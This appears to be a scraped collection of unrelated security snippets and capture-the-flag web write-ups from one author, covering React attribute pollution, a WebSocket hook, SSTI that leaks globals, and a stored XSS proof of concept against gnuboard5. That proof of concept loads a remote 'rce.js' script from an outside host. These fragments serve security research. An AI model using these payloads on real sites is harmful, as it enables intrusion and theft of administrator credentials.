stypr

'use strict'

/**
 * MailDev - routes.js
 */
const express = require('express')
const compression = require('compression')
const pkg = require('../package.json')
const { filterEmails } = require('./utils')

stypr

TL;DR

Exploiting a react app by customElement and is=is pollution

Solution

1. There is a bug with the hydration, so we can pollute prop of the <img> tag.
2. Error message is triggered when the window.width < 600. Interestingly, location.hash fills the props upon displaying the error message.
3. When the error message is shown and you try to resize your window.width > 600, <img> is shown again.
4. Since there is a dehydration bug, prop gets filled with the existing location.hash, making it possible to add additional attributes on the `` tag.

stypr

// run before send
const originalSend = WebSocket.prototype.send;
window.sockets = [];
WebSocket.prototype.send = function(...args) {
  if (window.sockets.indexOf(this) === -1)
    window.sockets.push(this);
  return originalSend.call(this, ...args);
};

// run after send

stypr

https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4

stypr

web: guestbook writeup

Checking configs/worker

docker-compose.yml

Docker-compose is build in a way that

1. private has flag in /flag
2. redis / worker are used. this is only used for admin to check the challenge.

stypr

web: simpleboard writeup

Let's check the main page's source code by view-source (view-source:http://web1.bingo.hypwnlab.com:12044/)

As wee see in the following, server loads an image from a website.

        <h3 class="text-center text-white pt-5"><img src="/?image=6c6f676f.png"></h3>

Let's take a look at the function in init.php that loads the image.

stypr

web: temporary writeup

There are two instances namely public and internal. We can get the address of public by leaking $_SERVER['REMOTE_ADDR"] in phpinfo.php?phpinfo

$_SERVER['SERVER_NAME']	_
$_SERVER['SERVER_PORT']	80
$_SERVER['SERVER_ADDR']	172.21.0.2

stypr

SSTI

1. Write one comment
2. When writing a comment content, do SSTI to leak author's credentials

{rating[comments][0].__class__.__init__.__globals__}
{'__name__': 'app.loaddata', '__doc__': None, '__package__': 'app', '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, '__spec__': ModuleSpec(name='app.loaddata', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, origin='./app/loaddata.py'), '__file__': './app/loaddata.py', '__cached__': './app/__pycache__/loaddata.cpython-38.pyc', '__builtins__': {'__name__': 'builtins', '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", '__package__': '', '__loader__': , '__spec__': ModuleSpec(name='builtins', loader=), '__build_class__': , '__import__': , 'abs': , 'all': , 'any': , 'ascii': , 'bin': , 'breakpoint': , 'callable': , 'chr': , 'compile': , 'delattr': , 'dir': , 'divmod': , 'eval': , 'exec': , 'format': 

stypr

#!/usr/bin/python
#Nothing on stackoverflow works!

import zipfile
import sys

zip = zipfile.ZipFile('FILENAME', 'r')
zipinfo = zip.infolist()
for _file in zipinfo:
    _file.filename = bytes(_file.filename).decode('cp949')

stypr

<!--
	Stored XSS (2019.01.02)
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
	<input type='hidden' name='fg_no' value=''>
	<input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
	var random = Math.round(Math.random() * 1000000000);
	var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin